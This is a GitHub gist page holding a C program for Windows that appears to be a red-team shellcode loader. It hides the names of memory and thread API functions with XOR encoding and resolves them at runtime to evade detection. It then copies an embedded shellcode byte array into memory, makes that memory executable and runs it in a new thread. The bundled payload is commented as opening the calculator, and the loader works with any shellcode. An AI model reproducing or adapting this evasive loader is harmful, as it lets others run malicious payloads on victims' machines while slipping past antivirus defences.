Created
October 23, 2023 05:48
-
-
Save trevorsaudi/51cb353e6f7e6950452d658d30ac9e62 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include "helpers.h" | |
| #pragma comment(linker, "/entry:WinMain") | |
| typedef DWORD (WINAPI * WaitForSingleObject_t)( | |
| HANDLE hHandle, | |
| DWORD dwMilliseconds | |
| ); | |
| typedef BOOL (WINAPI * CloseHandle_t)( | |
| HANDLE hObject | |
| ); | |
| typedef LPVOID(WINAPI *VirtualAlloc_t)( | |
| LPVOID lpAddress, | |
| SIZE_T dwSize, | |
| DWORD flAllocationType, | |
| DWORD flProtect | |
| ); | |
| typedef void(WINAPI *RtlMoveMemory_t)( | |
| void *Destination, | |
| const void *Source, | |
| SIZE_T Length | |
| ); | |
| typedef BOOL(WINAPI *VirtualProtect_t)( | |
| LPVOID lpAddress, | |
| SIZE_T dwSize, | |
| DWORD flNewProtect, | |
| PDWORD lpflOldProtect | |
| ); | |
| typedef HANDLE(WINAPI *CreateThread_t)( | |
| LPSECURITY_ATTRIBUTES lpThreadAttributes, | |
| SIZE_T dwStackSize, | |
| LPTHREAD_START_ROUTINE lpStartAddress, | |
| LPVOID lpParameter, | |
| DWORD dwCreationFlags, | |
| LPDWORD lpThreadId | |
| ); | |
| void XOR(char * data, size_t data_len, char * key, size_t key_len) { | |
| int j; | |
| j = 0; | |
| for (int i = 0; i < data_len; i++) { | |
| if (j == key_len - 1) j = 0; | |
| data[i] = data[i] ^ key[j]; | |
| j++; | |
| } | |
| } | |
| //int main(void) { | |
| int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, | |
| LPSTR lpCmdLine, int nCmdShow) { | |
| char key[] = "hellohackers"; | |
| char sVirtualAlloc[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x22,0x07,0x09,0x1d,0x10,0x00 }; | |
| char sRtlMoveMemory[] = {0x3a,0x11,0x00,0x21,0x00,0x1e,0x04,0x2e,0x0e,0x08,0x1d,0x01,0x11,0x00 }; | |
| char sVirtualProtect[] = {0x3e,0x0c,0x1e,0x18,0x1a,0x09,0x0d,0x33,0x19,0x0a,0x06,0x16,0x0b,0x11,0x00 }; | |
| char sCreateThread[] = {0x2b,0x17,0x09,0x0d,0x1b,0x0d,0x35,0x0b,0x19,0x00,0x13,0x17,0x00 }; | |
| char sWaitForSingleObject[] = {0x3f,0x04,0x05,0x18,0x29,0x07,0x13,0x30,0x02,0x0b,0x15,0x1f,0x0d,0x2a,0x0e,0x06,0x0a,0x0b,0x15 }; | |
| unsigned char payload[] = { | |
| // shellcode to open calc | |
| 0xfc,0x48,0x83,0xe4,0xf0,0xe8, | |
| 0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48, | |
| 0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48, | |
| 0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a, | |
| 0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c, | |
| 0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41, | |
| 0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b, | |
| 0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01, | |
| 0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0, | |
| 0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6, | |
| 0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41, | |
| 0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45, | |
| 0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0, | |
| 0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0, | |
| 0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e, | |
| 0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20, | |
| 0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9, | |
| 0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00, | |
| 0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba, | |
| 0x31,0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41, | |
| 0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c, | |
| 0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72, | |
| 0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c, | |
| 0x63,0x2e,0x65,0x78,0x65,0x00}; | |
| unsigned int payload_len = 350; | |
| XOR((char *) sVirtualAlloc, sizeof(sVirtualAlloc) - 1, key, sizeof(key)); | |
| XOR((char *) sRtlMoveMemory, sizeof(sRtlMoveMemory) -1, key, sizeof(key)); | |
| XOR((char *) sVirtualProtect, sizeof(sVirtualProtect) -1, key, sizeof(key)); | |
| XOR((char *) sCreateThread, sizeof(sCreateThread) - 1, key, sizeof(key)); | |
| XOR((char *) sWaitForSingleObject, sizeof(sWaitForSingleObject) - 1, key, sizeof(key)); | |
| WaitForSingleObject_t pWaitForSingleObject = (WaitForSingleObject_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sWaitForSingleObject); | |
| VirtualAlloc_t pVirtualAlloc = (VirtualAlloc_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sVirtualAlloc); | |
| RtlMoveMemory_t pRtlMoveMemory = (RtlMoveMemory_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sRtlMoveMemory); | |
| VirtualProtect_t pVirtualProtect = (VirtualProtect_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sVirtualProtect); | |
| CreateThread_t pCreateThread = (CreateThread_t)hlpGetProcAddress(hlpGetModuleHandle(L"KERNEL32.DLL"), sCreateThread); | |
| LPVOID exec_mem = pVirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); | |
| // Copy payload to new buffer | |
| pRtlMoveMemory(exec_mem, payload, payload_len); | |
| // Make new buffer as executable | |
| DWORD oldprotect; | |
| BOOL rv = pVirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect); | |
| // If all good, run the payload | |
| if (rv != 0) { | |
| HANDLE th = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec_mem, 0, 0, 0); | |
| pWaitForSingleObject(th, INFINITE); | |
| } | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment